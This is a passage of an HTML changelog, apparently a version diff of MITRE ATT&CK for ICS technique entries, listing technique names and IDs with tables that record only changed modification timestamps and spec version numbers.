collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1695] Block Communications</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23 19:52:53.490000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.726000+00:00</td></tr></tbody></table></details><hr><h4>[T1691] Block Operational Technology Message</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23 18:49:15.673000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.624000+00:00</td></tr></tbody></table></details><hr><h4>[T0846.002] Remote System Discovery: Broadcast Discovery</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23 19:43:10.464000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.714000+00:00</td></tr></tbody></table></details><hr><h4>[T0892] Change Credential</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-04-16 21:26:20.690000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.726000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T0858] Change Operating Mode</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-04-16 21:26:11.583000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.623000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1691.001] Block Operational Technology Message: Command Message</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23 18:50:42.389000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.621000+00:00</td></tr></tbody></table></details><hr><h4>[T1692.001] Unauthorized Message: Command Message</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23 18:59:19.225000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.629000+00:00</td></tr></tbody></table></details><hr><h4>[T0807] Command-Line Interface</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-04-16 21:26:11.069000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.623000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T0885] Commonly Used Port</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-04-16 21:26:19.961000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.723000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T0809] Data Destruction</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-04-16 21:26:14.108000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.630000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1694.001] Insecure Credentials: Default Credentials</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23 19:30:36.158000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.634000+00:00</td></tr></tbody></table></details><hr><h4>[T0816] Device Restart/Shutdown</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-04-16 21:26:11.395000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.623000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T0843.001] Program Download: Download All</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23 00:01:28.898000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.642000+00:00</td></tr></tbody></table></details><hr><h4>[T1695.002] Block Communications: Ethernet</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23 19:57:13.444000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.635000+00:00</td></tr></tbody></table></details><hr><h4>[T0822] External Remote Services</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-04-16 21:26:16.385000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.705000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T0823] Graphical User Interface</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-04-16 21:26:17.144000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.707000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1694.002] Insecure Credentials: Hardcoded Credentials</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23 19:32:38.851000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.640000+00:00</td></tr></tbody></table></details><hr><h4>[T1694] Insecure Credentials</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23 19:29:41.601000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.628000+00:00</td></tr></tbody></table></details><hr><h4>[T0827] Loss of Control</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-04-15 19:58:56.356000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.706000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T0829] Loss of View</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-04-15 19:58:08.228000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.621000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T0838] Modify Alarm Settings</h4><p><b>Current version</b>: 1.2</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-04-16 21:26:19.764000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.723000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1693] Modify Firmware</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23 19:06:21.253000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.643000+00:00</td></tr></tbody></table></details><hr><h4>[T1693.002] Modify Firmware: Module Firmware</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23 19:15:57.683000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.642000+00:00</td></tr></tbody></table></details><hr><h4>[T0846.003] Remote System Discovery: Multicast Discovery</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23 19:45:38.166000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.636000+00:00</td></tr></tbody></table></details><hr><h4>[T0840] Network Connection Enumeration</h4><p><b>Current version</b>: 1.2</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-04-15 19:59:18.381000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.723000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T0843.002] Program Download: Online Edit</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23 17:40:18.368000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.721000+00:00</td></tr></tbody></table></details><hr><h4>[T0846.001] Remote System Discovery: Port Scan</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23 19:41:07.822000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.635000+00:00</td></tr></tbody></table></details><hr><h4>[T0843.003] Program Download: Program Append</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23 00:18:49.737000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.634000+00:00</td></tr></tbody></table></details><hr><h4>[T0843] Program Download</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-04-16 21:26:18.212000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.713000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T0873] Project File Infection</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23 19:35:14.939000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.723000+00:00</td></tr></tbody></table></details><hr><h4>[T0886] Remote Services</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-04-16 21:26:19.525000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.722000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T0846] Remote System Discovery</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23 19:39:03.420000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.718000+00:00</td></tr></tbody></table></details><hr><h4>[T0888] Remote System Information Discovery</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-04-16 21:26:12.694000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.624000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1691.002] Block Operational Technology Message: Reporting Message</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23 18:52:34.062000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.643000+00:00</td></tr></tbody></table></details><hr><h4>[T1692.002] Unauthorized Message: Reporting Message</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23 19:01:42.644000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.633000+00:00</td></tr></tbody></table></details><hr><h4>[T0852] Screen Capture</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:21.744000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.715000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1695.001] Block Communications: Serial COM</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23 19:59:10.079000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.634000+00:00</td></tr></tbody></table></details><hr><h4>[T0873.001] Project File Infection: Siemens Project File Format</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23 19:37:43.545000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.625000+00:00</td></tr></tbody></table></details><hr><h4>[T1693.001] Modify Firmware: System Firmware</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23 19:10:31.871000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.639000+00:00</td></tr></tbody></table></details><hr><h4>[T0882] Theft of Operational Information</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: 